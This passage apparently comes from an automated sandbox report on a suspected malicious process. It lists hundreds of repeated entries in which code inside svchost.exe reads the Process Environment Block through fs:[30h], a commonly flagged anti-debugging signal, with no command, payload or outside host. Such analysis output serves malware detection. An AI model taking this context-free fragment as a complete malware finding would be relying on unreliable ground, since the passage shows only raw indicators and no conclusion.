            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h]2_2_0302C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h]2_2_030C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03070185 mov eax, dword ptr fs:[00000030h]2_2_03070185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]2_2_031061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]2_2_030601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]2_2_030B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]2_2_0302A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]2_2_0302C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6030 mov eax, dword ptr fs:[00000030h]2_2_030C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]2_2_03032050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]2_2_030B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]2_2_0305C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]2_2_0303208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]2_2_030C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]2_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]2_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]2_2_030B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0302A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]2_2_030380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]2_2_030B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]2_2_0302C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]2_2_030720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]2_2_0306C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]2_2_03030710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]2_2_03060710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]2_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h]2_2_030AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov esi, dword ptr fs:[00000030h]2_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030750 mov eax, dword ptr fs:[00000030h]2_2_03030750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h]2_2_030BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h]2_2_030B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038770 mov eax, dword ptr fs:[00000030h]2_2_03038770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D678E mov eax, dword ptr fs:[00000030h]2_2_030D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030307AF mov eax, dword ptr fs:[00000030h]2_2_030307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E47A0 mov eax, dword ptr fs:[00000030h]2_2_030E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h]2_2_0303C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h]2_2_030B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h]2_2_030BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h]2_2_030AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072619 mov eax, dword ptr fs:[00000030h]2_2_03072619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h]2_2_0304E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03066620 mov eax, dword ptr fs:[00000030h]2_2_03066620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068620 mov eax, dword ptr fs:[00000030h]2_2_03068620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303262C mov eax, dword ptr fs:[00000030h]2_2_0303262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h]2_2_0304C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03062674 mov eax, dword ptr fs:[00000030h]2_2_03062674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03034690 mov eax, dword ptr fs:[00000030h] 2_2_03034690
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h] 2_2_0306C6A6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h] 2_2_030666B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h] 2_2_0306A6C7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h] 2_2_0306A6C7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h] 2_2_030B06F1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h] 2_2_030B06F1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C6500 mov eax, dword ptr fs:[00000030h] 2_2_030C6500
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h] 2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h] 2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h] 2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h] 2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h] 2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h] 2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h] 2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h] 2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h] 2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h] 2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h] 2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h] 2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h] 2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h] 2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h] 2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h] 2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h] 2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h] 2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03038550 mov eax, dword ptr fs:[00000030h] 2_2_03038550
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03038550 mov eax, dword ptr fs:[00000030h] 2_2_03038550
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h] 2_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h] 2_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h] 2_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03032582 mov eax, dword ptr fs:[00000030h] 2_2_03032582
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03032582 mov ecx, dword ptr fs:[00000030h] 2_2_03032582
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03064588 mov eax, dword ptr fs:[00000030h] 2_2_03064588
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E59C mov eax, dword ptr fs:[00000030h] 2_2_0306E59C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h] 2_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h] 2_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h] 2_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h] 2_2_030545B1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h] 2_2_030545B1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h] 2_2_0306E5CF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h] 2_2_0306E5CF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030365D0 mov eax, dword ptr fs:[00000030h] 2_2_030365D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h] 2_2_0306A5D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h] 2_2_0306A5D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030325E0 mov eax, dword ptr fs:[00000030h] 2_2_030325E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h] 2_2_0306C5ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h] 2_2_0306C5ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h] 2_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h] 2_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h] 2_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h] 2_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h] 2_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h] 2_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302C427 mov eax, dword ptr fs:[00000030h] 2_2_0302C427
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h] 2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h] 2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h] 2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h] 2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h] 2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h] 2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h] 2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A430 mov eax, dword ptr fs:[00000030h] 2_2_0306A430
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] 2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] 2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] 2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] 2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] 2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] 2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] 2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] 2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EA456 mov eax, dword ptr fs:[00000030h] 2_2_030EA456
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302645D mov eax, dword ptr fs:[00000030h] 2_2_0302645D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305245A mov eax, dword ptr fs:[00000030h] 2_2_0305245A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BC460 mov ecx, dword ptr fs:[00000030h] 2_2_030BC460
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h] 2_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h] 2_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h] 2_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EA49A mov eax, dword ptr fs:[00000030h] 2_2_030EA49A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030364AB mov eax, dword ptr fs:[00000030h] 2_2_030364AB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030644B0 mov ecx, dword ptr fs:[00000030h] 2_2_030644B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BA4B0 mov eax, dword ptr fs:[00000030h] 2_2_030BA4B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030304E5 mov ecx, dword ptr fs:[00000030h] 2_2_030304E5
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] 2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] 2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] 2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] 2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] 2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] 2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] 2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] 2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] 2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h] 2_2_0305EB20
